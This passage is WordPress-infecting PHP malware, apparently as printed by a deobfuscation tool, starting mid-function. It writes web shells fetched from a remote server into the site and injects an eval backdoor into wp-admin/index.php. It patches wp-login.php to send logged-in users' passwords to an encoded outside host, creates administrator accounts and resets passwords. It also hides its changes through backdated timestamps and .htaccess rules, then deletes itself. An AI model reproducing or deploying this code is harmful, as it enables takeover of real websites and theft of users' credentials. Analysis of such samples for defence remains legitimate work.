$return_result['message'][] = 'file:' . " \t" . $xdnew_url2 . ' success';
$return_result['file'][] = $xdnew_url2;
}
//create wp-content/plugins/wp-config-sample.php end
//create wp-admin.php
$filename5='wp-admin.php';
$rfnew5 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename5))
{
@chmod($root.'/'.$filename5,0644);
}
$xdnew_ok5 = @file_put_contents($root.'/'.$filename5,$rfnew5);
if ( $xdnew_ok5 ) {
$xdnew_url5 = $http . "://" . $host . '/' . $filename5;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url5 . ' success';
//$return_result['file'][] = $xdnew_url5;
}
//create wp-admin.php
//create wp-admin/checkbox.php
$filename6='wp-admin/checkbox.php';
$rfnew6 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename6))
{
@chmod($root.'/'.$filename6,0644);
}
$xdnew_ok6 = @file_put_contents($root.'/'.$filename6,$rfnew6);
if ( $xdnew_ok6 ) {
$xdnew_url6 = $http . "://" . $host . '/' . $filename6;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url6 . ' success';
//$return_result['file'][] = $xdnew_url6;
@touch('wp-admin/checkbox.php', strtotime("-280 days", time()));
}
//create wp-admin/checkbox.php end
//create checkbex.php
$loginpart=get( $domain . 'mjcode/login.gif');
$filename3='checkbex.php';
if(!$seller)
{
$rfnew3 = get( $domain . 't1/h3.gif');
}
else
{
$rfnew3 =file_get_contents($root.$seller);
$rfnew3 = $loginpart.$rfnew3;
}
if(file_exists($root.'/'.$filename3))
{
@chmod($root.'/'.$filename3,0644);
}
$xdnew_ok3 = @file_put_contents($root.'/'.$filename3,$rfnew3);
if ( $xdnew_ok3 ) {
$xdnew_url3 = $http . "://" . $host . '/' . $filename3;
$return_result['message'][] = 'file:' . " \t" . $xdnew_url3 . ' success';
$return_result['file'][] = $xdnew_url3;
}
//create checkbex.php end
$check_repeat = array();
// $custom_file = array('wp-content','wp-includes');
$custom_file = array();
$wrmfwlf = array(
'/h1.gif',
'/h2.gif',
'/h3.gif',
'/h4.gif',
'/h5.gif',
'/i1.gif',
'/i2.gif',
'/i3.gif',
'/i4.gif',
'/i5.gif'
);
if($seller)
{
array_push($wrmfwlf,$seller,$seller);
}
if(count($arpath8)<=9)
{
for($num=0;$num<count($arpath8);$num++)
{
array_push( $custom_file, $arpath8[$num] );
}
}
else
{
$ranfile = array_rand( $arpath8, count( $wrmfwlf ) - count( $custom_file ) );
foreach ( $ranfile as $i ) {
array_push( $custom_file, $arpath8[ $i ] );
}
}
$self_shell_name = array(
'updates.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'spacings.php'.$enfile7,
'duotones.php'.$enfile7,
'admin.php'.$enfile7,
'index.php'.$enfile7,
'themes.php'.$enfile7,
'customsizes.php'.$enfile7,
'checkbex.php'.$enfile7
);
if($seller)
{
array_push($self_shell_name,'wp-options.php'.$enfile7,'wp-link.php'.$enfile7);
}
//updates.php|wp-config-sample.php|themes.php|dimensiones.php|duotones.php|spacings.php|update.php|customs.php
$i = 0;
if(count($arpath8)<=9)
{
$enfilecount=sizeof( $arpath8 );
}
else
{
$enfilecount=sizeof( $wrmfwlf );
}
while ( $i < $enfilecount ) {
$htens[ $custom_file[ $i ] ] = $self_shell_name[ $i ];
$sf = $custom_file[$i] . '/' . $self_shell_name[ $i ];
if(strpos($wrmfwlf[ $i ],'.php') !== false){
$rf = $loginpart.file_get_contents($root.$wrmfwlf[ $i ]);
}else{
$rf = get( $domain . 't1' . $wrmfwlf[ $i ] );
}
$xd_ok = @file_put_contents($sf,$rf);
//$fh = fopen( $sf, "w+" );
//$xd_ok = fwrite( $fh, $rf );
//fclose( $fh );
if ( $xd_ok ) {
$xd_url = $http . "://" . $host . '/' . $sf;
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
//if( basename($sf.'/index.php') != 'index.php' ){
// $self_shell_name[] = basename($sf);
//}
}
$i ++;
}
$wp_admin_content = @file_get_contents( 'wp-admin/index.php' );
if ( $wp_admin_content ) {
$vercontent=get( $domain.'/k/ver.gif');
$result = @file_put_contents( $root.'/wp-admin/index.php', "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>" .$vercontent."\n". $wp_admin_content );
if ( $result ) {
@touch('wp-admin/index.php', strtotime("-320 days", time()));
$xd_url = $http . "://" . $host . '/' . 'wp-admin/index.php';
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
}
}
$htc = '';
$htc .= '<IfModule mod_rewrite.c>' . "\n";
$htc .= 'RewriteEngine On' . "\n";
$htc .= 'RewriteBase /' . "\n";
$htc .= 'RewriteRule ^index.php$ - [L]' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "\n";
$htc .= 'RewriteRule . index.php [L]' . "\n";
$htc .= '</IfModule>' . "\n";
$htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Deny from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
$htc .= '<FilesMatch "^({#htens})$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Allow from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
$htresult = file_put_contents( $root . '/.hcontentold', json_encode( $htens ) );
$htresult = file_put_contents( $root . '/.hcontent', $htc );
if ( $htresult ) {
$return_result['htcontent'] = $htc;
}
return $return_result;
}
function get( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $ch, CURLOPT_ENCODING, 'gzip,deflate' );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array( 'Expect:' ) );
if ( stripos( $url, "https:" ) === false ) {
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
}
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
$body = curl_exec( $ch );
curl_close( $ch );
return $body;
}
function output_message( $result, $message_type = 'html', $html_tag = 'li' ) {
if ( $message_type != 'html' ) {
echo json_encode( $result );
return;
}
if ( ! is_array( $result ) ) {
return;
}
if ( ! isset( $result['title'] ) ) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
if ( sizeof( $result['message'] ) > 0 ) {
foreach ( $result['message'] as $message ) {
$message = str_replace( 'success', '<font color="blue">success</font>', $message );
$message = str_replace( ' ok', '<font color="blue"> ok</font>', $message );
$message = str_replace( 'fail', '<font color="red">fail</font>', $message );
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if ( isset( $result['status'] ) && ! empty( $result['status'] ) ) {
if ( $result['status'] == 'ok' ) {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ( $result['status'] == 'fail' ) {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
}
function adduser($username, $encryptedPassword, $changeAllPassword)
{
global $root, $http, $host, $domain, $ht, $gov;
$contents = file_get_contents("wp-config.php");
preg_match("@['|\"]DB_NAME['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchd);
preg_match("@['|\"]DB_USER['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchu);
preg_match("@['|\"]DB_PASSWORD['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchp);
preg_match("@['|\"]DB_HOST['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchh);
preg_match("@table_prefix\s*=\s*['|\"](.*?)['|\"]@", $contents, $matchw);
$db_name = $matchd[1];
$db_user = $matchu[1];
$db_pass = $matchp[1];
$db_host = $matchh[1];
$db_pre = $matchw[1];
$db_port = "3306";
if (strstr($db_host, ":")) {
$arr = explode(":", $db_host);
$db_host = $arr[0];
$db_port = $arr[1];
}
if (trim($db_host) == "") {
$db_host = "localhost";
}
$con = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port);
if ($changeAllPassword == true) {
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword'";
$query = mysqli_query($con, $sql);
}
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if (!empty($row)) {
$id= $row['ID'];
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword' where user_login='$username';";
$query = mysqli_query($con, $sql);
return "user $username exists, change password";
} else {
$sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$username', '$encryptedPassword', '$username', '[email protected]', '2021-05-21 09:13:26', '', '0', '$username');";
$query = mysqli_query($con, $sql);
$sql = "select ID from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
$id = $row['ID'];
$sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
$query = mysqli_query($con, $sql);
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if ($row['user_login'] == $username) {
return "useradd $username ok";
}
$sql = "select * from ".$db_pre."usermeta where user_id=1 ;";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) > 0) {
while($row = mysqli_fetch_array($result)) {
$meta_key[]=$row["meta_key"];
$meta_value[]= $row["meta_value"];
}
}
for($b=0;$b<count($meta_key);$b++)
{
if($meta_key[$b]<>'')
{
$sql = "select * from ".$db_pre."usermeta where user_id=". $id." and meta_key='".$meta_key[$b]."';";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) <= 0)
{
$sql = "insert into ".$db_pre."usermeta(user_id, meta_key, meta_value) values(".$id.", '".$meta_key[$b]."', '".$meta_value[$b]."');";
$query = mysqli_query($con, $sql);
}
}
}
}
return "useradd $username fail";
}
function loginpassword()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (file_exists($root."/wp-login.php")) {
$src="/*login*/
function getm(\$url){ \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); \$cnt = curl_exec(\$ch); curl_close(\$ch); return \$cnt;} if(isset(\$_POST['log']) && isset(\$_POST['pwd'])) { \$username=\$_POST['log'];
\$password=\$_POST['pwd'];
if(\$username){ \$userm = wp_authenticate( \$_POST['log'], \$_POST['pwd']);
if ( !is_wp_error( \$userm ) ) {
\$hurl=\$_SERVER['HTTP_HOST']; \$m=\"dt=\".date(\"Y-m-d-H:i:s\",time()).\"&shost=\".\$hurl.\"&user=\".\$username.\"&pwd=\".\$password; \$ws=\"\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f\"; @getm(\$ws.'/wup.php?'.\$m);} } } ";
$wplogin_file=$root.'/wp-login.php';
$handle = fopen($wplogin_file, "r");
if ($handle) {
$size = filesize($wplogin_file);
$wploginc = fread($handle, $size);
}
$f_put = "\x66il\x65_p\x75t_\x63on\x74en\x74s";
$f_get = "\x66il\x65_g\x65t_\x63on\x74en\x74s";
if (preg_match('/case \'login\':[\s\S]*?default:/', $wploginc)) {
$wploginc = preg_replace('/case \'login\':[\s\S]*?default:/', "case 'login':"."\n"."\n".'default:', $wploginc);
}
$wploginc= str_replace('default:',$src."\n"."\n".'default:',$wploginc);
$f_put($root.'/wp-login.php',$wploginc);
$wplogin=$f_get($root.'/wp-login.php');
$wplogin_code= str_replace("http://s.newnday.xyz/",strto16("http://s.newnday.xyz/"),$wplogin);
$f_put($root.'/wp-login.php',$wplogin_code);
}
if (file_exists($root."/wp-config.php")) {
$return_result['message'][] = adduser('wp-blog', '$P$BrYz9dLFOzP5z/3vTIH2fhdtEyGH7z.', true);
$return_result['message'][] = adduser('wp-user', '3a0b9bff4e2649af7d4c62878bf88b3e', false);
}
if (!is_dir($root . '/wp-includes') || !is_dir($root . '/wp-content')) {
$return_result['message'][] ='The site is not wp.';
}
return $return_result;
}
$sedht_result = sedht();
output_message($sedht_result, $message_type);
$enfile_result = enfile(); // 3
down_s_file();
if ( file_exists( "wp-config.php" ) ) {
//$adduser_message = adduser();
//$enfile_result['message'][] = $adduser_message;
}
output_message( $enfile_result, $message_type );
if ( $message_type == 'html' ) {
if ( isset( $enfile_result['file'] ) && sizeof( $enfile_result['file'] ) ) {
echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
foreach ( $enfile_result['file'] as $file ) {
$pas="\x47\157\x23\45\x31\60\x32\64\x40\115\x76\143";
echo $file."?pas=" .$pas. "\t";
}
echo "</textarea>";
}
if ( isset( $enfile_result['htcontent'] ) ) {
echo "htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
echo $enfile_result['htcontent'];
echo "</textarea>";
}
}
function down_s_file() {
global $domain;
$gh = get( $domain . '/h/gh.gif' );
if ( function_exists( 'file_put_contents' ) ) {
file_put_contents( 'gh.php', $gh );
} else {
$fh = fopen( 'gh.php', "a+" );
fwrite( $fh, $gh );
fclose( $fh );
}
}
function fi1( $path ) {
global $root, $arpath8;
if ( $handle = opendir( $path ) ) {
while ( ( $file = readdir( $handle ) ) !== false ) {
if ( $file != "." && $file != ".." ) {
$pfile = $path . "/" . $file;
if ( is_dir( $pfile ) && ! is_link( $pfile ) ) {
if ( substr_count( str_replace( $root . '/', '', $pfile ), '/' ) < 3 ) {
fi1( $pfile );
}
if ( ! file_exists( $pfile . "/index.php" ) ) {
array_push( $arpath8, str_replace( $root . '/', '', $pfile ) );
}
}
}
}
}
shuffle( $arpath8 );
}
function sedht()
{
global $root, $http, $host, $ht, $domain;
$return_data = array();
$robots_code="User-agent: *"."\n"."Allow: /"."\n"."\n"."Sitemap: host/sitemap.xml"."\n"."Sitemap: host/sitemap.xml.gz"."\n"."Sitemap: host/?sitemap.xml"."\n"."Sitemap: host/sitemap.xml.gz";
$robots_code=str_replace('host',$http.'://'.$host,$robots_code);
$robots_put=@file_put_contents($root.'/robots.txt', $robots_code);
if (!$robots_put || $robots_code=='')
{
$return_data['message'][] = 'modify file robots.txt file fail.';
}
else
{
$return_data['message'][] = 'modify file robots.txt file success.';
}
if(file_exists($root .'/sitemap.xml'))
{
@unlink($root .'/sitemap.xml');
}
@chmod('.htaccess', 0644);
$file_time = filectime('.htaccess');
$n = file_put_contents('.htaccess', $ht);
if (!$n) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'write .htaccess file fail';
} else {
$return_data['message'][] = '.htaccess create success.';
touch('.htaccess', $file_time);
$return_data['message'][] = '.htaccess time modify success';
@chmod('.htaccess', 0444);
$return_data['message'][] = '.htaccess 0444 modify success';
}
return $return_data;
}
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
if (is_dir($root."/wp-includes") && is_dir($root."/wp-admin")) {
$loginpassword_result = loginpassword(); // 4
output_message($loginpassword_result, $message_type);
}
@unlink( __FILE__ );
?>Function Calls
| header | 1 |
Stats
| MD5 | f9a9e46e833548a44351172b600b9781 |
| Eval Count | 0 |
| Decode Time | 170 ms |